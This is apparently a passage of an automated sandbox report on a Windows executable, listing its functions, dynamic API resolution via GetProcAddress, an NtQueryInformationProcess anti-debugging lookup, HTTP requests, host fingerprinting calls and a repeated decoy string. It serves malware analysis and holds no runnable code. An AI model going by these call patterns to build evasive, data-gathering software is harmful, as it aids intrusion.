37430->37431 37432 d4610 2 API calls 37431->37432 37433 d425c 37432->37433 37434 d4610 2 API calls 37433->37434 37435 d4275 37434->37435 37436 d4610 2 API calls 37435->37436 37437 d428e 37436->37437 37438 d4610 2 API calls 37437->37438 37439 d42a7 37438->37439 37440 d4610 2 API calls 37439->37440 37441 d42c0 37440->37441 37442 d4610 2 API calls 37441->37442 37443 d42d9 37442->37443 37444 d4610 2 API calls 37443->37444 37445 d42f2 37444->37445 37446 d4610 2 API calls 37445->37446 37447 d430b 37446->37447 37448 d4610 2 API calls 37447->37448 37449 d4324 37448->37449 37450 d4610 2 API calls 37449->37450 37451 d433d 37450->37451 37452 d4610 2 API calls 37451->37452 37453 d4356 37452->37453 37454 d4610 2 API calls 37453->37454 37455 d436f 37454->37455 37456 d4610 2 API calls 37455->37456 37457 d4388 37456->37457 37458 d4610 2 API calls 37457->37458 37459 d43a1 37458->37459 37460 d4610 2 API calls 37459->37460 37461 d43ba 37460->37461 37462 d4610 2 API calls 37461->37462 37463 d43d3 37462->37463 37464 d4610 2 API calls 37463->37464 37465 d43ec 37464->37465 37466 d4610 2 API calls 37465->37466 37467 d4405 37466->37467 37468 d4610 2 API calls 37467->37468 37469 d441e 37468->37469 37470 d4610 2 API calls 37469->37470 37471 d4437 37470->37471 37472 d4610 2 API calls 37471->37472 37473 d4450 37472->37473 37474 d4610 2 API calls 37473->37474 37475 d4469 37474->37475 37476 d4610 2 API calls 37475->37476 37477 d4482 37476->37477 37478 d4610 2 API calls 37477->37478 37479 d449b 37478->37479 37480 d4610 2 API calls 37479->37480 37481 d44b4 37480->37481 37482 d4610 2 API calls 37481->37482 37483 d44cd 37482->37483 37484 d4610 2 API calls 37483->37484 37485 d44e6 37484->37485 37486 d4610 2 API calls 37485->37486 37487 d44ff 37486->37487 37488 d4610 2 API calls 37487->37488 37489 d4518 37488->37489 37490 d4610 2 API calls 37489->37490 37491 d4531 37490->37491 37492 d4610 2 API calls 37491->37492 37493 d454a 37492->37493 37494 d4610 2 API calls 37493->37494 37495 d4563 37494->37495 
37496 d4610 2 API calls 37495->37496 37497 d457c 37496->37497 37498 d4610 2 API calls 37497->37498 37499 d4595 37498->37499 37500 d4610 2 API calls 37499->37500 37501 d45ae 37500->37501 37502 d4610 2 API calls 37501->37502 37503 d45c7 37502->37503 37504 d4610 2 API calls 37503->37504 37505 d45e0 37504->37505 37506 d4610 2 API calls 37505->37506 37507 d45f9 37506->37507 37508 e9f20 37507->37508 37509 ea346 8 API calls 37508->37509 37510 e9f30 43 API calls 37508->37510 37511 ea3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37509->37511 37512 ea456 37509->37512 37510->37509 37511->37512 37513 ea526 37512->37513 37514 ea463 8 API calls 37512->37514 37515 ea52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37513->37515 37516 ea5a8 37513->37516 37514->37513 37515->37516 37517 ea647 37516->37517 37518 ea5b5 6 API calls 37516->37518 37519 ea72f 37517->37519 37520 ea654 9 API calls 37517->37520 37518->37517 37521 ea738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37519->37521 37522 ea7b2 37519->37522 37520->37519 37521->37522 37523 ea7ec 37522->37523 37524 ea7bb GetProcAddress GetProcAddress 37522->37524 37525 ea825 37523->37525 37526 ea7f5 GetProcAddress GetProcAddress 37523->37526 37524->37523 37527 ea922 37525->37527 37528 ea832 10 API calls 37525->37528 37526->37525 37529 ea98d 37527->37529 37530 ea92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37527->37530 37528->37527 37531 ea9ae 37529->37531 37532 ea996 GetProcAddress 37529->37532 37530->37529 37533 e5ef3 37531->37533 37534 ea9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37531->37534 37532->37531 37535 d1590 37533->37535 37534->37533 37805 d16b0 37535->37805 37538 eaab0 lstrcpy 37539 d15b5 37538->37539 37540 eaab0 lstrcpy 37539->37540 37541 d15c7 37540->37541 37542 eaab0 lstrcpy 37541->37542 37543 d15d9 37542->37543 37544 eaab0 lstrcpy 37543->37544 37545 d1663 37544->37545 37546 e5760 

                            Control-flow Graph (function e9bb0-e9f12; rendered graph and its Executed/Not Executed legend not reproduced)
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00D42470), ref: 000E9BF1
                            • GetProcAddress.KERNEL32(74DD0000,00D42380), ref: 000E9C0A
                            • GetProcAddress.KERNEL32(74DD0000,00D42500), ref: 000E9C22
                            • GetProcAddress.KERNEL32(74DD0000,00D423B0), ref: 000E9C3A
                            • GetProcAddress.KERNEL32(74DD0000,00D423E0), ref: 000E9C53
                            • GetProcAddress.KERNEL32(74DD0000,00D48F68), ref: 000E9C6B
                            • GetProcAddress.KERNEL32(74DD0000,00D35B10), ref: 000E9C83
                            • GetProcAddress.KERNEL32(74DD0000,00D35D50), ref: 000E9C9C
                            • GetProcAddress.KERNEL32(74DD0000,00D424E8), ref: 000E9CB4
                            • GetProcAddress.KERNEL32(74DD0000,00D42218), ref: 000E9CCC
                            • GetProcAddress.KERNEL32(74DD0000,00D424A0), ref: 000E9CE5
                            • GetProcAddress.KERNEL32(74DD0000,00D42368), ref: 000E9CFD
                            • GetProcAddress.KERNEL32(74DD0000,00D35E50), ref: 000E9D15
                            • GetProcAddress.KERNEL32(74DD0000,00D42410), ref: 000E9D2E
                            • GetProcAddress.KERNEL32(74DD0000,00D424B8), ref: 000E9D46
                            • GetProcAddress.KERNEL32(74DD0000,00D35DD0), ref: 000E9D5E
                            • GetProcAddress.KERNEL32(74DD0000,00D42278), ref: 000E9D77
                            • GetProcAddress.KERNEL32(74DD0000,00D422A8), ref: 000E9D8F
                            • GetProcAddress.KERNEL32(74DD0000,00D35AF0), ref: 000E9DA7
                            • GetProcAddress.KERNEL32(74DD0000,00D42230), ref: 000E9DC0
                            • GetProcAddress.KERNEL32(74DD0000,00D35BD0), ref: 000E9DD8
                            • LoadLibraryA.KERNEL32(00D42518,?,000E6CA0), ref: 000E9DEA
                            • LoadLibraryA.KERNEL32(00D42530,?,000E6CA0), ref: 000E9DFB
                            • LoadLibraryA.KERNEL32(00D42548,?,000E6CA0), ref: 000E9E0D
                            • LoadLibraryA.KERNEL32(00D42560,?,000E6CA0), ref: 000E9E1F
                            • LoadLibraryA.KERNEL32(00D42578,?,000E6CA0), ref: 000E9E30
                            • GetProcAddress.KERNEL32(75A70000,00D425C0), ref: 000E9E52
                            • GetProcAddress.KERNEL32(75290000,00D42590), ref: 000E9E73
                            • GetProcAddress.KERNEL32(75290000,00D425A8), ref: 000E9E8B
                            • GetProcAddress.KERNEL32(75BD0000,00D425D8), ref: 000E9EAD
                            • GetProcAddress.KERNEL32(75450000,00D35B50), ref: 000E9ECE
                            • GetProcAddress.KERNEL32(76E90000,00D48FC8), ref: 000E9EEF
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 000E9F06
                            Strings
                            • NtQueryInformationProcess, xrefs: 000E9EFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: b56de6d53b02d4806cf4801a4f5db3ce99dd71db6e8be56822ccf7ed55482f25
                            • Instruction ID: 7eb3f1c958dd9d4f50df43c5931017bee5e642f87665922689be1485fcb1b049
                            • Opcode Fuzzy Hash: b56de6d53b02d4806cf4801a4f5db3ce99dd71db6e8be56822ccf7ed55482f25
                            • Instruction Fuzzy Hash: 3BA1FDB66182009FC346DFA9EDC9A667BFDA78F701F148A1AB909C3270D7349941CF60

                            Control-flow Graph (function d4610-d47f9; rendered graph and its Executed/Not Executed legend not reproduced)
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D465E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000D47EC
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D479F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46FC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D47AA
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D47C0
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4693
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46C8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D476E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46BD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46D3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4667
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4784
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D47B5
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4728
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46A7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46B2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4672
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D467D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4763
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4712
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D478F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4688
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4707
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4779
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D471D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D47CB
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, $-separated)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 7f737f3a4eb103eee06325281a8ece4ebc2619ea724f4b313a47775b6cb46d69
                            • Instruction ID: cb4d61ee81fd9527132fb6e9810f9b10ea8f7ff9f50523281954532fffea3c05
                            • Opcode Fuzzy Hash: 7f737f3a4eb103eee06325281a8ece4ebc2619ea724f4b313a47775b6cb46d69
                            • Instruction Fuzzy Hash: 0541F9606C2E1F6EE634B7A78D42DBF77975F42709FA07064EB005A782CBF0650075AA

                            Control-flow Graph (function d62d0-d657d; rendered graph and its Executed/Not Executed legend not reproduced)
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                              • Part of subcall function 000D4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • InternetOpenA.WININET(000F0DFF,00000001,00000000,00000000,00000000), ref: 000D6331
                            • StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D6353
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6385
                            • HttpOpenRequestA.WININET(00000000,GET,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D63D5
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D640F
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D6421
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000D644D
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000D64BD
                            • InternetCloseHandle.WININET(00000000), ref: 000D653F
                            • InternetCloseHandle.WININET(00000000), ref: 000D6549
                            • InternetCloseHandle.WININET(00000000), ref: 000D6553
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: 5e25782fe47e2b3cf0bcfecc695afeb9cde11559b02669b499a7b39324e1c35d
                            • Instruction ID: 3fd386069d26b169fee5e7ebb4833520e883cc0c307b9d8afd7be26701bd58b0
                            • Opcode Fuzzy Hash: 5e25782fe47e2b3cf0bcfecc695afeb9cde11559b02669b499a7b39324e1c35d
                            • Instruction Fuzzy Hash: A1718071A00318EFDB24DF90DC59FEE77B8AB49300F108099F20A6B295DBB56A84CF51

                            Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
                            control_flow_graph 1356 e7690-e76da GetWindowsDirectoryA 1357 e76dc 1356->1357 1358 e76e3-e7757 GetVolumeInformationA call e8e90 * 3 1356->1358 1357->1358 1365 e7768-e776f 1358->1365 1366 e778c-e77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 e7771-e778a call e8e90 1365->1367 1369 e77b8-e77e8 wsprintfA call eaa50 1366->1369 1370 e77a9-e77b6 call eaa50 1366->1370 1367->1365 1377 e780e-e781e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000E76D2
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E770F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7793
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E779A
                            • wsprintfA.USER32 ref: 000E77D0
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\
                            • API String ID: 1544550907-3809124531
                            • Opcode ID: 4e1113069d319dcb0de3c07e08c9570f54b091b03ebc2f90d3f7e2832da74661
                            • Instruction ID: 54e34093e2f4b1d2e400d82d07b62944ea9e8c7c3f6ffc6b8ff9bb0819a4589c
                            • Opcode Fuzzy Hash: 4e1113069d319dcb0de3c07e08c9570f54b091b03ebc2f90d3f7e2832da74661
                            • Instruction Fuzzy Hash: 6E41B2B1D043889FDB10DB95CC85BEEBBB8AF49700F104199F609BB281D7746A44CBA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7A10
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7A17
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E7A2F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 785894bffc79b4ab2d042ee9c24f1131b5018eaf6fd32ab11ef25163870431a9
                            • Instruction ID: 6c9c9062f6fa95ebec077940cd41284ac1e2c7f8cee237993b6d91362b1fa329
                            • Opcode Fuzzy Hash: 785894bffc79b4ab2d042ee9c24f1131b5018eaf6fd32ab11ef25163870431a9
                            • Instruction Fuzzy Hash: D9F04FB2948249EFC710DF99DD89BAEBBBCEB45711F10061AFA15A2680C77515008BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 0a157a969e9abcb6709b61b2238117b89d05148287303628d79154a45c568460
                            • Instruction ID: f7abd5d3395468adf8a18a4e96e899ba7816f94f8c54df1dd1b7655394a9759b
                            • Opcode Fuzzy Hash: 0a157a969e9abcb6709b61b2238117b89d05148287303628d79154a45c568460
                            • Instruction Fuzzy Hash: E4D09E7490431CABCB04DFE09D896DDBBBCFB0D715F100555D90562341EA315455CB65

                            Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
                            control_flow_graph 633 e9f20-e9f2a 634 ea346-ea3da LoadLibraryA * 8 633->634 635 e9f30-ea341 GetProcAddress * 43 633->635 636 ea3dc-ea451 GetProcAddress * 5 634->636 637 ea456-ea45d 634->637 635->634 636->637 638 ea526-ea52d 637->638 639 ea463-ea521 GetProcAddress * 8 637->639 640 ea52f-ea5a3 GetProcAddress * 5 638->640 641 ea5a8-ea5af 638->641 639->638 640->641 642 ea647-ea64e 641->642 643 ea5b5-ea642 GetProcAddress * 6 641->643 644 ea72f-ea736 642->644 645 ea654-ea72a GetProcAddress * 9 642->645 643->642 646 ea738-ea7ad GetProcAddress * 5 644->646 647 ea7b2-ea7b9 644->647 645->644 646->647 648 ea7ec-ea7f3 647->648 649 ea7bb-ea7e7 GetProcAddress * 2 647->649 650 ea825-ea82c 648->650 651 ea7f5-ea820 GetProcAddress * 2 648->651 649->648 652 ea922-ea929 650->652 653 ea832-ea91d GetProcAddress * 10 650->653 651->650 654 ea98d-ea994 652->654 655 ea92b-ea988 GetProcAddress * 4 652->655 653->652 656 ea9ae-ea9b5 654->656 657 ea996-ea9a9 GetProcAddress 654->657 655->654 658 eaa18-eaa19 656->658 659 ea9b7-eaa13 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00D35BB0), ref: 000E9F3D
                            • GetProcAddress.KERNEL32(74DD0000,00D35C70), ref: 000E9F55
                            • GetProcAddress.KERNEL32(74DD0000,00D49640), ref: 000E9F6E
                            • GetProcAddress.KERNEL32(74DD0000,00D49610), ref: 000E9F86
                            • GetProcAddress.KERNEL32(74DD0000,00D49658), ref: 000E9F9E
                            • GetProcAddress.KERNEL32(74DD0000,00D49688), ref: 000E9FB7
                            • GetProcAddress.KERNEL32(74DD0000,00D3B630), ref: 000E9FCF
                            • GetProcAddress.KERNEL32(74DD0000,00D4D3C8), ref: 000E9FE7
                            • GetProcAddress.KERNEL32(74DD0000,00D4D308), ref: 000EA000
                            • GetProcAddress.KERNEL32(74DD0000,00D4D320), ref: 000EA018
                            • GetProcAddress.KERNEL32(74DD0000,00D4D260), ref: 000EA030
                            • GetProcAddress.KERNEL32(74DD0000,00D35D10), ref: 000EA049
                            • GetProcAddress.KERNEL32(74DD0000,00D35C30), ref: 000EA061
                            • GetProcAddress.KERNEL32(74DD0000,00D35C50), ref: 000EA079
                            • GetProcAddress.KERNEL32(74DD0000,00D35C90), ref: 000EA092
                            • GetProcAddress.KERNEL32(74DD0000,00D4D248), ref: 000EA0AA
                            • GetProcAddress.KERNEL32(74DD0000,00D4D0F8), ref: 000EA0C2
                            • GetProcAddress.KERNEL32(74DD0000,00D3B838), ref: 000EA0DB
                            • GetProcAddress.KERNEL32(74DD0000,00D35D30), ref: 000EA0F3
                            • GetProcAddress.KERNEL32(74DD0000,00D4D200), ref: 000EA10B
                            • GetProcAddress.KERNEL32(74DD0000,00D4D338), ref: 000EA124
                            • GetProcAddress.KERNEL32(74DD0000,00D4D3E0), ref: 000EA13C
                            • GetProcAddress.KERNEL32(74DD0000,00D4D278), ref: 000EA154
                            • GetProcAddress.KERNEL32(74DD0000,00D35D90), ref: 000EA16D
                            • GetProcAddress.KERNEL32(74DD0000,00D4D2D8), ref: 000EA185
                            • GetProcAddress.KERNEL32(74DD0000,00D4D1A0), ref: 000EA19D
                            • GetProcAddress.KERNEL32(74DD0000,00D4D380), ref: 000EA1B6
                            • GetProcAddress.KERNEL32(74DD0000,00D4D110), ref: 000EA1CE
                            • GetProcAddress.KERNEL32(74DD0000,00D4D1E8), ref: 000EA1E6
                            • GetProcAddress.KERNEL32(74DD0000,00D4D350), ref: 000EA1FF
                            • GetProcAddress.KERNEL32(74DD0000,00D4D218), ref: 000EA217
                            • GetProcAddress.KERNEL32(74DD0000,00D4D128), ref: 000EA22F
                            • GetProcAddress.KERNEL32(74DD0000,00D4D230), ref: 000EA248
                            • GetProcAddress.KERNEL32(74DD0000,00D4A810), ref: 000EA260
                            • GetProcAddress.KERNEL32(74DD0000,00D4D290), ref: 000EA278
                            • GetProcAddress.KERNEL32(74DD0000,00D4D398), ref: 000EA291
                            • GetProcAddress.KERNEL32(74DD0000,00D35DB0), ref: 000EA2A9
                            • GetProcAddress.KERNEL32(74DD0000,00D4D140), ref: 000EA2C1
